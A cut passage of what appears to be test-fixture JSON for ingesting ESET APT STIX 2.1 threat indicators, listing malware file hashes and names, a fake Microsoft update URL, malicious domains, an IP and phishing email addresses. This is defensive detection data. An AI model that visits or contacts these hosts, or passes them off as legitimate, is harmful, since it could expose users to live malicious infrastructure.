\"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:00:06.000Z\", \"pattern\": \"[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = '4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = 
'732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T14:40:01Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "d7519b822434fb89fb3643bc2f450e23", + "sha1": "4fcf10a8fe9db80c3eaf172636a602f95b64b0fc", + "sha256": "732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f" + } + }, + "last_seen": "2023-09-29T09:00:06.000Z", + "modified_at": "2023-09-29T09:00:06.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T09:00:10.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T09:00:10.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T09:00:10.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T09:00:10.000Z\", \"pattern\": \"[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T19:07:41Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + 
"preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "36b06d73347fe0da8177bd212e2b3f77", + "sha1": "f1fc033763b931a729b9da3eb29a0724fd3eb6b9", + "sha256": "a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9" + }, + "name": "fghsd.bat" + }, + "last_seen": "2023-09-29T09:00:10.000Z", + "modified_at": "2023-09-29T09:00:10.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:42.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:42.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:42.000Z\", \"pattern\": \"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 
07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + "modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:47.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:47.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:47.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:47.000Z\", \"pattern\": \"[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = '354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 
'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-19T12:07:09Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "b8ef6fbfda87b44d969f338b958b2257", + "sha1": "a85c7e14848013efb20469b35e8b70f1e447d54f", + "sha256": "354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14" + }, + "name": "kafil.exe" + }, + "last_seen": "2023-09-29T08:48:47.000Z", + "modified_at": "2023-09-29T08:48:47.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:48:51.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:51.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:48:51.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:48:51.000Z\", \"pattern\": \"[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = 
'5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-14T11:39:37Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "2995a24f6bb7eef7824a5e309fbb3443", + "sha1": "bd1dc1b52d55c6b236b1c768353666be962109a6", + "sha256": "5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981" + }, + "name": "Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3" + }, + "last_seen": "2023-09-29T08:48:51.000Z", + "modified_at": "2023-09-29T08:48:51.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:59:10.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:59:10.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:59:10.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59\", \"kill_chain_phases\": 
[{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:59:10.000Z\", \"pattern\": \"[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-25T08:02:07Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7c3c16981350845838d6f69f50568434", + "sha1": "afcc824bd83676badd5712dbfac1c61468480d54", + "sha256": "1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e" + }, + "name": "as.dll" + }, + "last_seen": "2023-09-29T08:59:10.000Z", + "modified_at": "2023-09-29T08:59:10.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T08:59:50.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:59:50.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T08:59:50.000Z\", \"created_by_ref\": 
\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T08:59:50.000Z\", \"pattern\": \"[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = '9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-07T09:01:06Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "f4671beb11a28846a53f81ac1ba333e4", + "sha1": "3c4efa52fcfa42f0dccaee70cec7462811fb7b06", + "sha256": "e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605" + }, + "name": "PassCat.exe" + }, + "last_seen": "2023-09-29T08:59:50.000Z", + "modified_at": "2023-09-29T08:59:50.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-03T13:20:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-02T13:20:09.000Z" + }, + "event": { + 
"category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T13:20:09.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--c2d3ca78-8832-4f2c-a770-59184731baf5\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T13:20:09.000Z\", \"pattern\": \"[domain-name:value = 'anguisbi.ru']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-07T06:13:58Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-03T13:20:09.000Z", + "modified_at": "2023-10-03T13:20:09.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "anguisbi.ru" + } + } + } + }, + { + "@timestamp": "2023-10-03T13:20:52.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-02T13:20:52.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T13:20:52.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--fd162f17-3d98-4129-9574-06ecdf733f6f\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T13:20:52.000Z\", \"pattern\": \"[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']\", \"pattern_type\": \"stix\", 
\"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-08T06:31:14Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-03T13:20:52.000Z", + "modified_at": "2023-10-03T13:20:52.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "http://134.209.223.199", + "port": 80, + "scheme": "http" + } + } + } + }, + { + "@timestamp": "2023-10-03T11:49:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", + "meta_category": "file", + "name": "file", + "valid_until": "2024-10-02T11:49:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-03T11:49:09.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--cdc79d14-87bc-4011-b371-55fef054e1bd\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T11:49:09.000Z\", \"pattern\": \"[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. 
Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \\u00a9 2005-2010 Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-27T05:34:03Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "376002acdf350488c4a3cb5c75e8bbf1", + "sha1": "654f86929a79700157f1ea10db4abe2d3e2be4e9", + "sha256": "460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583" + } + }, + "last_seen": "2023-10-03T11:49:09.000Z", + "modified_at": "2023-10-03T11:49:09.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-09-29T19:44:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "category": "Network activity", + "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", + "type": "email-dst", + "valid_until": "2024-09-28T19:44:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-09-29T19:44:05.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--8ea4a915-b7d5-448c-91f9-1f328102f800\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": 
\"Network activity\"}], \"labels\": [\"misp:type=\\\"email-dst\\\"\", \"misp:category=\\\"Network activity\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-09-29T19:44:05.000Z\", \"pattern\": \"[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T19:44:05Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-09-29T19:44:05.000Z", + "modified_at": "2023-09-29T19:44:05.000Z", + "provider": "eset", + "type": "email-addr" + } + } + }, + null, + { + "@timestamp": "2023-10-02T07:41:04.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d9a10671-eb84-4039-8211-277c14104b39", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T07:41:04.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T07:41:04.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--d9a10671-eb84-4039-8211-277c14104b39\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T07:41:04.000Z\", \"pattern\": \"[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + 
"name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T07:41:04.000Z", + "modified_at": "2023-10-02T07:41:04.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://microsoft-update-com.github.io/kb5021042/", + "path": "/kb5021042/", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T07:58:05.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", + "meta_category": "network", + "name": "email", + "valid_until": "2024-10-01T07:58:05.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T07:58:05.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--696f64c3-733b-4cba-8757-e0cb99142ffa\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"email\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T07:58:05.000Z\", \"pattern\": \"[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-10-02T07:58:05Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T07:58:05.000Z", + "modified_at": "2023-10-02T07:58:05.000Z", + "provider": "eset", + "type": "email-addr" + } + } + }, + { + "@timestamp": "2023-10-03T08:15:57.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", + "meta_category": "file", + "name": "file", + "valid_until": "2024-10-02T08:15:57.000Z" + }, + "event": { + "category": [ + "threat" + ], + 
"kind": "enrichment", + "original": "{\"created\": \"2023-10-03T08:15:57.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"file\"}], \"labels\": [\"misp:name=\\\"file\\\"\", \"misp:meta-category=\\\"file\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-03T08:15:57.000Z\", \"pattern\": \"[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = '06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-09-29T10:46:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "8a4c807caea1cd9d3552bed916320ee6", + "sha1": "5438e26e5f7d819ef4fcd39b84e575f4c452f234", + "sha256": "06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607" + }, + "name": "install-kb-5021042.cmd" + }, + "last_seen": "2023-10-03T08:15:57.000Z", + "modified_at": "2023-10-03T08:15:57.000Z", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-02T13:48:17.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-01T13:48:17.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T13:48:17.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7\", 
\"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T13:48:17.000Z\", \"pattern\": \"[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2022-03-26T00:00:00Z\", \"valid_until\": \"2023-09-29T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T13:48:17.000Z", + "modified_at": "2023-10-02T13:48:17.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "billyconsult.com" + } + } + } + }, + { + "@timestamp": "2023-10-02T13:16:00.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": 